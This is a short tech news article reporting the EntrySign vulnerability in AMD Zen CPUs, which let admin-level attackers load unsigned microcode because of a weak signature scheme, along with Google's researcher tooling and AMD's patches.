Dubbed EntrySign, this vulnerability allows local admin-level attackers to sidestep AMD’s microcode security system and slip in their rogue updates.

When designing Zen, AMD made a shocking schoolboy error by using AES-CMAC as a hash function—something it was never designed for. Even worse, the boffins found AMD had been using a publicly available example key from NIST documentation since Zen 1, effectively rolling out the red carpet for hackers.

By exploiting this blunder, attackers can inject malicious microcode that alters the CPU’s fundamental behaviour until the next reboot.

Google’s researchers gleefully demonstrated this by tweaking the RDRAND instruction to always return predictable values, wreaking havoc on any cryptographic process relying on AMD’s random number generation.

To rub more salt in the wound, Google has released "zen tool," an open-source jailbreak kit that lets researchers create and deploy microcode patches on vulnerable AMD chips.

With disassembly tools, patch creation, and cryptographic signing support, the Zen tool allows researchers (and anyone curious) to explore AMD’s microcode ecosystem. This brings AMD up to speed with Chipzilla, which has had similar tooling for its processors for years.

AMD has scrambled to release microcode updates that replace the compromised validation system with a custom secure hash function. These patches use the AMD Secure Processor to verify updates before x86 cores process them.

While the exploit requires local admin access and doesn't survive a power cycle, it still spells bad news for confidential computing setups that rely on AMD’s SEV-SNP and DRTM security features.